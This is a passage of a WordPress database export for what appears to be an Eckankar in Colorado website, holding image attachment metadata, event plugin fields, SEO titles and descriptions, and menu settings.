Discussions'),(26856,173877,'_wp_attached_file','2019/10/activities-book-discussions-2.jpg'),(26857,173877,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:41:\"2019/10/activities-book-discussions-2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"activities-book-discussions-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:39:\"activities-book-discussions-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:41:\"activities-book-discussions-2-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26858,173926,'_wp_attached_file','2019/10/activities-ELSS-2.jpg'),(26859,173926,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:29:\"2019/10/activities-ELSS-2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"activities-ELSS-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"activities-ELSS-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:29:\"activities-ELSS-2-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442657464\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26860,173926,'_wp_attachment_image_alt','ECK Light and Sound Service'),(26861,174942,'_wp_attached_file','2019/10/harold-intro-Bg-4.jpg'),(26862,174942,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:182;s:6:\"height\";i:225;s:4:\"file\";s:29:\"2019/10/harold-intro-Bg-4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"harold-intro-Bg-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"harold-intro-Bg-4-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:29:\"harold-intro-Bg-4-146x180.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:29:\"harold-intro-Bg-4-182x150.jpg\";s:5:\"width\";i:182;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73678,254622,'_wp_attached_file','2020/01/the-sound-of-soul.png'),(73679,254622,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:189;s:4:\"file\";s:29:\"2020/01/the-sound-of-soul.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"the-sound-of-soul-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-300x189.png\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-250x129.png\";s:5:\"width\";i:250;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-349x180.png\";s:5:\"width\";i:349;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29741,204589,'_wc_gallery_custom_image_link',''),(29742,204589,'_wp_attachment_image_alt',''),(29752,204616,'_wp_attached_file','2019/12/co-EK-BGrid-logo-title-image-lg.png'),(142531,265030,'protect_children',''),(142532,265030,'_menu_item_type','post_type'),(142533,265030,'_menu_item_menu_item_parent','247336'),(142534,265030,'_menu_item_object_id','265024'),(142535,265030,'_menu_item_object','page'),(95556,262061,'_field_181','CATESTEVENS8@GMAIL.COM'),(125308,263323,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(125608,263349,'protect_children',''),(121157,263208,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609704512;s:12:\"_EventOrigin\";i:1609704512;s:13:\"_thumbnail_id\";i:1609704828;s:24:\"boldgrid_hide_page_title\";i:1609704512;s:17:\"_EventShowMapLink\";i:1609704512;s:13:\"_EventShowMap\";i:1609704512;s:15:\"_EventStartDate\";i:1609704828;s:13:\"_EventEndDate\";i:1609704828;s:18:\"_EventStartDateUTC\";i:1609704828;s:16:\"_EventEndDateUTC\";i:1609704828;s:14:\"_EventDuration\";i:1609704828;s:20:\"_EventCurrencySymbol\";i:1609704512;s:22:\"_EventCurrencyPosition\";i:1609704512;s:10:\"_EventCost\";i:1609704512;s:9:\"_EventURL\";i:1609704512;s:14:\"_EventTimezone\";i:1609704512;s:18:\"_EventTimezoneAbbr\";i:1609704512;s:27:\"_EventNextPendingRecurrence\";i:1609704512;s:26:\"_RTECregistrationsDisabled\";i:1609704512;s:17:\"_RTECdeadlineType\";i:1609704512;s:19:\"_RTECwhoCanRegister\";i:1609704512;s:23:\"_RTEClimitRegistrations\";i:1609704512;s:21:\"_RTECmaxRegistrations\";i:1609704512;s:16:\"_EventRecurrence\";i:1609704512;s:18:\"_RTECnumRegistered\";i:1609704512;s:13:\"_EventVenueID\";i:1609704512;s:12:\"_dp_original\";i:1609704512;s:16:\"tribe_events_cat\";i:1610245064;s:10:\"_edit_last\";i:1609704586;s:10:\"post_title\";i:1610219840;s:12:\"post_content\";i:1609704930;s:11:\"post_status\";i:1609704828;}'),(121180,263208,'_EventCurrencySymbol',''),(143509,265134,'mec_cost',''),(104124,262441,'_EventShowMapLink',''),(27098,181536,'_edit_lock','1698262473:2'),(27099,181536,'_edit_last','2'),(27100,181536,'_wp_page_template','default'),(27101,181536,'_wpac_members_redirect_to',''),(27102,181536,'_wpac_show_in_search','0'),(27103,181536,'_wpac_show_excerpt_in_search','0'),(27104,181536,'_wpac_nonmembers_redirect_to',''),(27105,181536,'boldgrid_hide_page_title','0'),(27106,181536,'boldgrid_in_page_containers','1'),(27107,181536,'bgseo_robots_index','index'),(27108,181536,'bgseo_robots_follow','follow'),(27138,181893,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:315;s:4:\"file\";s:25:\"2019/10/eck-privacy-1.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"eck-privacy-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-250x158.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-286x180.jpg\";s:5:\"width\";i:286;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-476x300.jpg\";s:5:\"width\";i:476;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:25:\"eck-privacy-1-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27137,181893,'_wp_attached_file','2019/10/eck-privacy-1.jpg'),(27449,198746,'_wp_attached_file','2019/10/leaves-sphere.jpg'),(27450,198746,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:367;s:6:\"height\";i:206;s:4:\"file\";s:25:\"2019/10/leaves-sphere.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"leaves-sphere-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"leaves-sphere-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"leaves-sphere-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"leaves-sphere-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"leaves-sphere-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"leaves-sphere-321x180.jpg\";s:5:\"width\";i:321;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"leaves-sphere-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(64784,7162,'bgseo_custom_keyword','About Eckankar In Colorado'),(146742,265639,'mec_additional_organizer_ids','a:0:{}'),(146741,265639,'mec_currency','a:0:{}'),(64976,31882,'bgseo_title','Eckankar Temple of Colorado - Past Lives, Dreams, and Soul Travel'),(64977,31882,'bgseo_description','Visit the Eckankar Temple of Colorado to find out more about ECK teachings on past lives, dreams, and Soul Travel. We offer book discussions, meetups, roundtable discussions, seminars, and lots more. We also have many ECK books and videos on hand. '),(65190,7160,'bgseo_title','Home - Eckankar in Colorado - Past Lives, Dreams, and Soul Travel '),(64978,31882,'bgseo_custom_keyword','Eckankar Temple of Colorado'),(65191,7160,'bgseo_description','Eckankar In Colorado serves the state of Colorado with books, tapes, classes, meetups, roundtable discussions, and seminars about Eckankar, The Path of Spiritual Freedom. You can learn about Past Lives, Dreams, and Soul Travel and take advanced study classes.'),(65192,7160,'bgseo_custom_keyword','Eckankar In Colorado - Past Lives, Dreams, and Soul Travel'),(63363,248630,'_wp_attached_file','2020/01/wslope-oldmine-sized-3.jpg'),(27530,198903,'_wp_attached_file','2019/10/island-heart.jpg'),(121088,263203,'_RTECmaxRegistrations','30'),(121089,263203,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(121090,263203,'_RTECnumRegistered','0'),(27453,198748,'_wp_attached_file','2019/10/purple-tree.jpg'),(27454,198748,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:23:\"2019/10/purple-tree.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"purple-tree-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"purple-tree-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"purple-tree-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"purple-tree-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"purple-tree-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"purple-tree-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"purple-tree-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27455,198749,'_wp_attached_file','2019/10/seashell-ocean.jpg'),(27456,198749,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:329;s:6:\"height\";i:206;s:4:\"file\";s:26:\"2019/10/seashell-ocean.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"seashell-ocean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"seashell-ocean-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"seashell-ocean-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:26:\"seashell-ocean-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:26:\"seashell-ocean-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:26:\"seashell-ocean-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:26:\"seashell-ocean-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27457,198750,'_wp_attached_file','2019/10/sphere-nature.jpg'),(27458,198750,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:308;s:6:\"height\";i:192;s:4:\"file\";s:25:\"2019/10/sphere-nature.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"sphere-nature-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"sphere-nature-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"sphere-nature-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"sphere-nature-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"sphere-nature-250x156.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"sphere-nature-289x180.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"sphere-nature-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27459,198751,'_wp_attached_file','2019/10/starfish-dancing.jpg'),(27460,198751,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:308;s:6:\"height\";i:192;s:4:\"file\";s:28:\"2019/10/starfish-dancing.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"starfish-dancing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"starfish-dancing-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"starfish-dancing-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:28:\"starfish-dancing-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"starfish-dancing-250x156.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"starfish-dancing-289x180.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"starfish-dancing-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27461,198752,'_wp_attached_file','2019/10/tiny-tree-in-glass.jpg'),(27462,198752,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:342;s:6:\"height\";i:192;s:4:\"file\";s:30:\"2019/10/tiny-tree-in-glass.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"tiny-tree-in-glass-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"tiny-tree-in-glass-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"tiny-tree-in-glass-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"tiny-tree-in-glass-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"tiny-tree-in-glass-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"tiny-tree-in-glass-321x180.jpg\";s:5:\"width\";i:321;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"tiny-tree-in-glass-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27463,198776,'_wp_attached_file','2019/10/tree-blue-lake.jpg'),(27464,198776,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:324;s:6:\"height\";i:192;s:4:\"file\";s:26:\"2019/10/tree-blue-lake.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"tree-blue-lake-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"tree-blue-lake-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"tree-blue-lake-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:26:\"tree-blue-lake-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:26:\"tree-blue-lake-250x148.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:26:\"tree-blue-lake-304x180.jpg\";s:5:\"width\";i:304;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:26:\"tree-blue-lake-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s